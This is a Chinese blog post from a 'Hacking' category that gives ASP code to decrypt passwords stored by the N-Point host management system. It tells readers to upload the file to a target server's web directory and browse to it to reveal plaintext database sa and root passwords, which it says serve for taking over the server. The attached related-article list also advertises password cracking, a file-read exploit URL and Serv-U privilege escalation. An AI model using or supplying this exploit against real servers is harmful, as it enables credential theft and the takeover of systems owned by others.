N点主机管理系统密码解密代码程序

最新推荐文章于 2023-10-31 09:35:53 发布
最新推荐文章于 2023-10-31 09:35:53 发布
阅读量1.5k 收藏
点赞数
分类专栏: Hacking 文章标签: 解密 加密 file 服务器 asp 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/god_7z1/article/details/6292984
版权

2010年12月20日 星期一 07:22


之前有写过<N点主机管理系统漏洞利用与防御措>的文章,那个我感觉其实也不算是漏洞吧.
这次在发个N点主机管理系统的加密密码解密漏洞利用代码程序吧,呵呵.
首先得了解下N点主机管理系统的密码加密可并非是cmd5等加密方式加密的.
即使用<N点主机管理系统漏洞利用与防御措>里介绍的办法登陆了管理系统的后台也是拿不下服务器的.
在N点主机管理系统下想获得服务器的权限也就是利用数据库里保存的sa帐号和root帐号才可以提权的.
但是密码是加密的,没办法获取,这次所发的代码利用程序是调用它的conn.asp来解迷的,呵呵.
原理这里就不仔细的说了,相关的代码网上也有公布,但是和我公布的并不一样,用起来也比我这个麻烦多了.
代码如下:
<!--#include file="inc/conn.asp" -->
<!--#include file="inc/siteinfo.asp" -->
<!--#include file="inc/char.asp" -->
<%
set iishost=server.CreateObject("npoint.host")
x=iishost.Eduserpassword("NLFPK@OJCOCLA@E@FEKJMFADLALKLF@JHOIMAHO@LCDBAAMEOEKGKM@A",0)
response.write x
%>
使用方法,复制该代码,创建个任意的asp文件,传在目标N点管理系统web下,把需要解密的密码,替换下代码里的那个密码.
在IE浏览器里浏览刚创建和保存的asp解迷文件地址,即可显示出所解迷的明文密码.(别告诉我说你不知道该怎么用噢)

[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
杨秀璋的专栏
09-15 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。本篇文章,作者将分享两篇论文,机器学习是如何运用到恶意代码攻击中的,并谈谈自己的理解,后续深入研究尝试分享相关实验,目前还是小白一只。基础性文章,希望对初学者有帮助,大神请飘过,谢谢各位看官!
OSCP-课外1(http万能密码、hydra密码暴力破解http、代码审计、Win缓存区溢出)
墨痕诉清风的博客
02-23 1828
通过将access.exe和funcs_access.dll文件发布到http://10.0.0.115/student_attendance/assets/uploads/access/目录,使用到Windows虚拟机下载到本地。到http://10.0.0.115/student_attendance/assets/uploads/看到了我们上传的shell文件。可以通过浏览器访问该目录http://10.0.0.115/student_attendance/assets/uploads/
N虚拟主机管理系统_终结者_漏洞+破解工具
11-14
把本程序根目录下的解密脚本(jm.asp)上传到N根目录下的web文件夹下,然后解密脚本除填入 N地址/jm.asp 即可进行密码破解,否则会破解失败。
perl实现N虚拟主机管理系统加密算法
01-18 963
#!/usr/bin/perl -w sub npoint{ my $CodeStr = $_[0]; print $CodeStr.$/; my $CodeLen = 32; my $CodeSpace = $CodeLen - length($CodeStr); if ($CodeSpace >= 1){
N虚拟主机管理系统 致命漏洞通杀所有版本(0day)
weixin_34005042的博客
06-28 511
这个漏洞本人 发现 已经很长时间了 由于时间比较忙一直没有发布。。 因为涉及服务器 比较多我就不发布怎么 得到后台PSW了。。。。 首先先分析下sitehost.asp他致命漏洞所在的页面 看红色部位 <!--#include file="sessioncolck.asp" --> <!--#include file="pagesession...
TRS WAS 5.0 用户手册
07-20
TRS WAS 5.0 用户手册,详细介绍
网络攻防研究第001篇:尝试暴力破解某高校研究生管理系统学生密码
墨鱼菜鸡
05-15 117
前言 如果你是在校大学生,而且还对网络攻防比较感兴趣的话,相信你最开始尝试渗透的莫过于所在院校的学生管理系统。因为一般来说这样的系统往往比较薄弱,拿来练手那是再合适不过的了。作为本系列的第一篇文章,我将会利用暴力破解的方式,尝试对某高校的研究生管理系统的学生密码进行破解。由于这个管理系统的网...
基于java固定资产管理系统设计(含源文件)
【完整】
03-08 7064
欢迎添加微信互相交流学习哦! 项目源码:https://gitee.com/oklongmm/biye 固定资产管理系统 摘 要 随着计算机信息技术的发展以及对资产、设备的管理科学化、合理化的高要求,利用计算机实现设备及资产的信息化管理已经显得非常重要。 固定资产管理系统是一个单位不可缺少的部分。但一直以来人们使用传统的人工方式管理固定资产的信息,这种管理方式存在着许多缺,这对于查找、更新和维护都带来了不小的困难。因此,开发一个界面友好,易操作的资产管理软件进行自动化管理变得十分重要。这正是本系.
基于STM32设计的智能门锁(手机APP开锁、随机密码开锁、按键开锁)_162
最新发布
10-31 6666
密码锁采用STM32单片机作为主控芯片,并通过WiFi模块(ESP8266)连接网络,可以实现远程开锁功能。用户可以使用手机APP将开锁指令发送到密码锁,从而实现无线开锁,提高了使用的便利性。 除了远程开锁外,该密码锁还支持密码输入开锁。用户可以通过在密码锁上输入正确的开锁密码进行开锁。
N6000工具编程软件
03-22
诺蒂菲尔N6000编程软件与教程 给学员们学习培训交流
n6000说明书
04-26
好好学习,坚持学习积累。终会有所收获
诺帝菲尔NFS3030消防系统操作说明书
08-29
诺帝菲尔NFS3030消防系统操作说明书
诺蒂菲尔N-6000-用户手册.pdf
06-27
简介 N-6000 是霍尼韦尔消防安防系统(上海)有限公司最新推出的新一代智能火灾报警控制器。满足 GB4717-2005 和 GB16806-2006 国标的要求。 该控制器集报警与联动控制于一体,并可通过上位机进行离线编程。 N-6000 联动型火灾自动报警控制器具有多项智能特性,诸如漂移补偿、灵敏度调整、自优化预 报警等。 同时,N-6000 联动型火灾报警控制器可参与消防联动控制、消防广播输出、气体灭火等,可接 CRT 显示终端,组成综合性的消防报警控制系统。适用于大型工厂、厂房、大型饭店、宾馆、机房、 商厦等重要场所。
消防高级主机密码
12-18
消防高级主机密码
记一次Serv-U提权
kendyhj9999的专栏
03-09 9743
记一次Serv-U提权 记一次Serv-U提权 http://hi.baidu.com/sdghgk/item/37b433ce7bce197489ad9e82 作者:白开 文章来源:http://hi.baidu.com/sdghgk Serv-U提权可谓是老生常谈了,由于Serv-U的用户多,提权成功率也高,众多ASP木马纷纷将此提权功能集成在内。然而通过这次提权我发
CNVD-2020-27769—拓尔思文件读取漏洞
战神/calmness的博客
10-14 3848
拓尔思TRSWAS5.0文件读取漏洞 注明:网上相关资料较少,进行整理了一下。展示相关的思路 1、描述 拓尔思中文检索系统TRSWAS5.0 web/tree接口treefile参数存在文件读取漏洞,可读取数据库配置文件、账户密码等信息,导致配置文件信息泄露威胁网站安全。 2、过程 http://IP地址//was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties 显示文件内容 3、修复
[工具使用]黑暗引擎FOFA
热门推荐
网络安全知识分享
08-29 3万+
黑暗引擎FOFAFOFA(我进入)逻辑运算符搜索子域名domain搜索指定内容的host全部域名bodycert搜索选定应用的网站搜索指定开放端口的IP搜索指定协议的IP搜索IP或者网段的信息搜索指定CSS/JS网站常用的一些内容其他 FOFA(我进入) 官网这样描述:FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 简单理解就是,一个本土加强版shodan,知道某产品在互联网的部署情况、
微信小程序OA系统源代码:打卡考勤与企业管理
### 微信小程序OA系统源代码知识详解 微信小程序是基于微信平台的应用程序,它们轻量级、易于访问和分享,为企业提供了一种方便的方式去触及用户。OA系统(Office Automation System,办公自动化系统)通常是指...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值